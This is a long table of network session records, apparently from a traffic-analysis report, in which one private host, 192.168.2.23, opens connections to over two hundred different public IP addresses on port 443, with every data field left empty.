                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17924192.168.2.236081483.67.91.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17925192.168.2.2349200199.44.135.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17926192.168.2.2337788176.235.195.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17927192.168.2.233449645.191.103.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17928192.168.2.2333662222.206.56.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17929192.168.2.234252250.172.152.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17930192.168.2.233836243.16.142.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17931192.168.2.2346588212.130.31.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17932192.168.2.233551462.93.10.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17933192.168.2.235928277.163.217.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17934192.168.2.234670440.208.226.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17935192.168.2.2342156197.197.209.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17936192.168.2.235140252.28.174.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17937192.168.2.233535865.241.99.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17938192.168.2.2343666211.113.120.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17939192.168.2.2333478103.12.164.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17940192.168.2.235551851.61.226.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17941192.168.2.2355244117.19.90.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17942192.168.2.234994841.183.221.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17943192.168.2.2358310126.166.17.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17944192.168.2.235633678.98.101.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17945192.168.2.235262490.116.143.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17946192.168.2.2350552148.131.216.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17947192.168.2.2344118166.182.2.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17948192.168.2.2350548138.234.234.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17949192.168.2.234657053.112.122.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17950192.168.2.235318096.90.86.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17951192.168.2.235229661.33.34.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17952192.168.2.234855873.94.13.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17953192.168.2.2341634167.145.12.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17954192.168.2.2350096129.48.105.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17955192.168.2.2353060115.231.130.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17956192.168.2.2336562123.209.149.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17957192.168.2.235837283.173.94.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17958192.168.2.2346876160.124.19.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17959192.168.2.234710835.0.238.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17960192.168.2.2337402112.221.226.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17961192.168.2.2352526192.222.204.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17962192.168.2.2344450134.189.70.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17963192.168.2.2346140185.34.59.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17964192.168.2.233559491.226.28.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17965192.168.2.2332778112.9.132.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17966192.168.2.2341280211.210.24.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17967192.168.2.2350512158.3.197.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17968192.168.2.2336026223.243.245.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17969192.168.2.2357354204.6.249.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17970192.168.2.235471047.93.100.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17971192.168.2.235946663.46.124.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17972192.168.2.2343570189.246.40.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17973192.168.2.2346730187.180.221.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17974192.168.2.233425476.213.12.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17975192.168.2.2350402138.201.237.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17976192.168.2.233430657.134.228.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17977192.168.2.2337896120.77.79.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17978192.168.2.2342992112.46.45.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17979192.168.2.2348948131.55.209.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17980192.168.2.234146866.193.194.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17981192.168.2.235332673.48.22.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17982192.168.2.2356980113.114.198.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17983192.168.2.236079642.37.241.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17984192.168.2.235050694.214.173.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17985192.168.2.2344612171.137.248.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17986192.168.2.2344738188.224.87.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17987192.168.2.2351844119.228.20.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17988192.168.2.2353444106.91.76.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17989192.168.2.2332876136.153.88.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17990192.168.2.233658846.250.53.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17991192.168.2.233614483.80.96.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17992192.168.2.2357176178.184.170.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17993192.168.2.2349848107.229.212.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17994192.168.2.2349950213.73.67.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17995192.168.2.2356246125.94.161.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17996192.168.2.233673651.75.135.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17997192.168.2.2359084110.212.171.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17998192.168.2.2350162198.70.155.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17999192.168.2.2349952220.162.148.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18000192.168.2.234069847.5.59.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18001192.168.2.2351722140.62.251.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18002192.168.2.2350102166.57.35.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18003192.168.2.235066098.0.61.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18004192.168.2.2333902148.218.175.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18005192.168.2.2360766184.179.199.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18006192.168.2.235029436.102.241.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18007192.168.2.2350360195.66.25.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18008192.168.2.2339866171.235.7.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18009192.168.2.233943069.215.16.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18010192.168.2.233827878.161.55.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18011192.168.2.2340710178.120.109.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18012192.168.2.235027234.83.243.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18013192.168.2.2348316196.67.183.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18014192.168.2.2338520183.218.233.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18015192.168.2.2352192161.99.230.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18016192.168.2.2353324104.174.135.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18017192.168.2.23540948.166.139.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18018192.168.2.2353166115.93.255.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18019192.168.2.234761820.10.106.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18020192.168.2.234187042.0.101.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18021192.168.2.2352106124.219.45.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18022192.168.2.234934474.71.127.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18023192.168.2.233921832.212.91.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18024192.168.2.2352854188.117.26.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18025192.168.2.233588276.212.7.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18026192.168.2.235240450.28.109.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18027192.168.2.2360690129.122.190.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18028192.168.2.2336814183.243.108.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18029192.168.2.236048858.146.15.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18030192.168.2.233933492.232.45.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18031192.168.2.23421364.171.51.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18032192.168.2.235425298.177.42.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18033192.168.2.2353996112.74.6.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18034192.168.2.235233418.177.147.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18035192.168.2.2358354118.185.60.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18036192.168.2.2343236196.196.210.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18037192.168.2.2351438138.171.231.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18038192.168.2.2344214195.149.170.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18039192.168.2.235510699.19.127.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18040192.168.2.2336312221.59.8.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18041192.168.2.2346324174.40.141.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18042192.168.2.23341508.252.184.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18043192.168.2.233846035.65.46.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18044192.168.2.2346644135.189.200.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18045192.168.2.234953225.233.113.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18046192.168.2.23431785.126.116.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18047192.168.2.2355444210.18.197.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18048192.168.2.234396612.196.74.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18049192.168.2.234857059.185.116.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18050192.168.2.2355692208.68.109.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18051192.168.2.2357438132.231.105.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18052192.168.2.2334486193.249.22.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18053192.168.2.2337460130.141.42.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18054192.168.2.233713035.111.220.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18055192.168.2.233476423.128.120.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18056192.168.2.2344022121.47.245.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18057192.168.2.2356736191.61.196.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18058192.168.2.2345410186.177.42.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18059192.168.2.2342222182.197.239.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18060192.168.2.2336892155.248.192.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18061192.168.2.2350230174.93.169.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18062192.168.2.2340364123.104.94.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18063192.168.2.234711668.185.90.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18064192.168.2.233839641.253.144.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18065192.168.2.233663431.139.57.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18066192.168.2.2336740217.34.71.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18067192.168.2.2334732195.181.202.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18068192.168.2.2348032185.153.166.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18069192.168.2.2354846121.167.125.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18070192.168.2.2341188162.50.101.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18071192.168.2.2351712160.247.32.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18072192.168.2.235595485.221.250.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18073192.168.2.2335960205.172.251.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18074192.168.2.234736492.72.73.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18075192.168.2.2341394108.216.47.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18076192.168.2.234008087.213.43.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18077192.168.2.2340228167.94.65.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18078192.168.2.2353668195.226.162.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18079192.168.2.235124818.140.147.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18080192.168.2.2348670102.129.107.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18081192.168.2.234623852.69.17.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18082192.168.2.235198819.25.231.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18083192.168.2.2344398211.72.248.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18084192.168.2.2358788164.69.98.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18085192.168.2.2348976123.230.160.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18086192.168.2.235982678.158.61.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18087192.168.2.2355270187.91.102.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18088192.168.2.234985851.10.235.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18089192.168.2.2340050118.196.25.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18090192.168.2.2337726199.94.170.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18091192.168.2.2338726181.89.246.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18092192.168.2.2358896157.139.15.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18093192.168.2.2357008160.226.24.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18094192.168.2.2333634162.63.129.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18095192.168.2.2358508109.51.71.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18096192.168.2.2354524196.229.73.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18097192.168.2.2343030207.69.247.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18098192.168.2.2334290114.54.118.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18099192.168.2.235778613.15.143.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18100192.168.2.234629665.53.36.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18101192.168.2.235405818.38.47.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18102192.168.2.2357228124.29.133.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18103192.168.2.2358688166.154.160.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18104192.168.2.2343954208.23.83.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18105192.168.2.2334002130.191.91.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18106192.168.2.2337076170.161.74.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18107192.168.2.2341040199.155.223.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18108192.168.2.2342826177.8.92.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18109192.168.2.235250663.213.31.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18110192.168.2.2350070213.55.72.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18111192.168.2.2359590149.52.47.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18112192.168.2.23419701.79.120.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18113192.168.2.234546817.113.230.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18114192.168.2.235075678.80.163.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18115192.168.2.2341138135.147.156.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18116192.168.2.235979619.23.186.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18117192.168.2.2353040125.116.207.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18118192.168.2.233653046.144.253.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18119192.168.2.235946662.143.198.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18120192.168.2.2348082190.7.117.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18121192.168.2.2347500110.4.118.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18122192.168.2.2345116132.75.78.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18123192.168.2.2339654161.221.5.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18124192.168.2.2338378173.158.67.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18125192.168.2.2343132129.44.134.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18126192.168.2.234074858.170.196.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18127192.168.2.2360776104.125.66.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18128192.168.2.235807099.109.234.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18129192.168.2.235058639.152.54.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18130192.168.2.2346878213.144.245.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18131192.168.2.2360130109.168.230.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18132192.168.2.2342442178.20.158.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18133192.168.2.234395863.144.112.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18134192.168.2.2333750154.226.58.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18135192.168.2.233629424.246.113.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18136192.168.2.234670871.7.221.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18137192.168.2.2343032176.141.219.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18138192.168.2.235385052.149.79.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18139192.168.2.2344960135.243.217.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18140192.168.2.2354810188.38.221.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18141192.168.2.2342448133.68.250.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18142192.168.2.2359574202.242.155.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18143192.168.2.2352394124.169.125.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18144192.168.2.235419892.150.39.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18145192.168.2.2342200150.249.149.123443
